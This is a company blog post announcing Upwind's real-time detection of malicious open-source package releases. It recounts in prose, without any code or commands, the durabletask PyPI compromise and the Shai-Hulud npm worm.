Supply Chain Attack Detections

Upwind Now Detects Novel Supply Chain Attacks in Real Time

Lidor Machluf Smiling person with short dark hair and a beard, wearing a black shirt with a logo that includes the letter U. The background is a plain light grey.

By Lidor Machluf & Tomer Hadassi

Jun 10, 2026

Software supply chain attacks are no longer rare events that make headlines once a quarter. In 2026, significant attacks are landing every few days, and the pace is accelerating. AI-assisted code generation is lowering the barrier for attackers to craft sophisticated, obfuscated payloads and inject them into trusted open source packages at scale. The window between a malicious package being published and it reaching production systems has collapsed to minutes.

Today, we’re announcing a new Upwind capability purpose-built for this reality: real-time supply chain attack detection across the open-source ecosystem.

supply chain attack detection

How It Works

Upwind now continuously monitors the repositories and distribution channels for every open-source package our customers depend on. This spans Git repositories, npm, PyPI, PHP, Go modules, RubyGems, and other major registries. When a new package version is published, Upwind automatically analyzes it for suspicious or malicious behavior and alerts within minutes.

The capability identifies malicious package releases regardless of how they were introduced, helping organizations detect emerging supply chain threats before they spread into production environments.

supply chain attack detection - miasma

Catching the durabletask Compromise in 10 Minutes

The system proved itself immediately. On May 19, Upwind detected that three new versions of Microsoft’s durabletask Python SDK (1.4.1, 1.4.2, and 1.4.3) had been injected with malicious code. The compromised versions included import-time code that downloaded and executed a remote payload, a Linux binary designed for multi-cloud credential theft, and a destructive wiper targeting Israeli and Iranian systems.

Upwind’s detection fired within 10 minutes of the first malicious package being uploaded to PyPI. Our research team reported the compromise directly to Microsoft through a public GitHub issue, and the affected versions were subsequently yanked from PyPI.

durabletask-1

Shai-Hulud: A Worm That Infected 20 Packages in One Shot

The durabletask incident was far from isolated. In the same week, Upwind tracked the continued evolution of the Shai-Hulud campaign – a supply chain worm that first appeared in intercom-client 7.0.4 in late April, where a compromised Intercom Node SDK turned a routine npm install into immediate remote code execution.

intercome-client-1

By May 11, the same operator had scaled the attack dramatically. Twenty TanStack packages, including widely-used routers for React, Vue, and Solid, were simultaneously compromised with a 2.3MB obfuscated stealer. The worm harvested AWS, Vault, Kubernetes, GitHub, and npm credentials, scraped secrets from CI runner memory, and used stolen OIDC tokens to self-propagate across the entire TanStack ecosystem in a single operation.

The attacker didn’t need to compromise 20 maintainers individually. One foothold in the publishing pipeline was enough to infect everything.

Tanstack-1

The New Normal Demands a New Speed

A year ago, a major supply chain attack was a quarterly event. Today, Upwind’s research team is tracking significant incidents every few days across npm, PyPI, and multiple ecosystems simultaneously. AI tools are making it easier for attackers to generate convincing, obfuscated malicious code and to contribute it at scale.

The gap between when a malicious package is published and when it starts executing in real environments is now measured in minutes. Traditional vulnerability databases and periodic scanning simply cannot keep up. Detection needs to operate at the same speed as the attack.

That’s what this capability delivers. Continuous monitoring, real-time diff analysis, and immediate detection, catching supply chain attacks before they reach your production systems.

To stay up to date with the latest threat findings, follow us on X or LinkedIn.

Upwind Now Detects Novel Supply Chain Attacks in Real Time

Further Reading

Securing Every Pillar of AI
Product

Security for AI: Every Pillar of Cloud Security Just Got a New Job

A smiling man wearing glasses and a pink t-shirt, sitting in a lounge in front of exposed brick.

By Amiram Shachar

Jun 04, 2026

A few weeks ago, I wrote about Upwind becoming agentic, AI for Security. We put a fleet of Agents, Blue, Red, and Green, to work investigating threats, validating exposures, and remediating risk at machine speed. That was one half of the story. This is the other half. Security for AI. AI has rewired our known […]

Cisco-Partnership-June26
Product

Upwind Brings Realtime Intelligence to Cisco Cloud Control

SamLangrockHeadshot

By Sam Langrock

Jun 02, 2026

We are thrilled to announce that Upwind has been selected as a launch partner for Cloud Control Studio, part of Cisco Cloud Control, bringing realtime intelligence on cloud and AI security into the platform. Unveiled at Cisco Live Las Vegas on June 2, 2026, Cisco Cloud Control is the unified platform for agentic IT operations.  […]

Top-Ten-MCP-Use-Cases
Product

We Compiled the Top 10 MCP Use Cases for Upwind

dan profile Medium Eldan Talis Omer Idel

By Danilo Michelucci, Eldan Talis & Omer Idel

May 29, 2026

A new vulnerability enters the backlog. A workload is exposed. A misconfiguration affects production. An identity behaves unexpectedly. A customer asks for evidence. An audit or pentest is coming up. Each moment requires the same understanding of what is real, what is urgent, what is connected, and what should happen next. The Upwind MCP Server […]